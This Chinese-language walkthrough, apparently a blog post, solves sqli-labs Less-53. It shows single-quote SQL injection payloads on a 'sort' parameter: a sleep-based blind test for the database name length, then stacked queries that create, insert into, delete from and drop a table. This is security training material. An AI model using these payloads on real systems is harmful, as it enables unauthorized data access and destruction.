sqli-labs/Less-53

这一关输入多次rand()页面没有发生变化 所以属于字符型注入

输入sort=1'试试看咯 没有回显 

那么只能尝试出知道正确回显时才能够知道正确的注入类型

试试一下输入

sort=1'--+

存在回显 说明注入类型属于单引号注入

但是这一关不能使用报错注入 也不能使用单纯的盲注(因为他至始至终都只显示同一张页面) 只能使用条件盲注了

首先获取一下数据库的长度 输入如下

sort=1' and if(length(database())=8,sleep(10),1)--+

 回显如下 很清楚的发现 页面仍然再响应 所以数据库的长度就是8 

接下去都是按套路出牌了 接着我要去完成一下堆叠注入

首先创建一个表格 输入如下

sort=1';create table demo like users;--+

数据库的回显如下所示

接着添加一条数据 输入如下

sort=1';insert into demo values(1,'xiaoyao','121212');--+

 数据库的回显如下所示

接着删除数据 输入如下

sort=1';delete from demo where id=1;--+

 数据库的回显如下所示

最后进行删表操作 输入如下

sort=1';drop table demo;--+

 数据库的回显如下所示

有大功告成了 嗨嗨！！